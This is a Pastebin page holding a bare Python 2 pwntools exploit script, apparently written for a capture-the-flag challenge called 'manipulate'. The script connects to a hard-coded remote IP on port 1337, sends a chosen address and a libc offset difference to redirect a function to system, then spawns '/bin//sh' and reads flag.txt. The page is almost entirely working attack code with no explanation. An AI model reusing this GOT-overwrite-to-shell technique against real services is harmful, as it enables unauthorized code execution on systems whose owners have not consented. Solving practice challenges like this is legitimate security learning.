SHARE
TWEET

Untitled

a guest Oct 18th, 2019 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2.  
  3. import sys,os
  4. from pwn import *
  5.  
  6. HOST="13.56.97.226"
  7. PORT=1337
  8.  
  9. TARGET=os.path.realpath("manipulate")
  10. LIBRARY=""
  11.  
  12. systembase=0x45390
  13. changeaddr=0x404048
  14. changebase=0x36e80
  15.  
  16. def exploit(r):
  17.  
  18.     for i in range(5):r.recvline()
  19.  
  20.     r.sendline('1')
  21.     r.recvline()
  22.     r.sendline(str(hex(changeaddr)[2:]))
  23.     r.recvline()
  24.     r.sendline(str(systembase-changebase))
  25.    
  26.     for i in range(6):r.recvline()
  27.     r.sendline('/bin//sh')
  28.     r.sendline('cat flag.txt')
  29.     print r.recvline()
  30.     r.close()
  31.     return
  32.  
  33. if __name__ == "__main__":
  34.     r = remote(HOST, PORT)
  35.     exploit(r)
  36.  
  37.     sys.exit(0)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top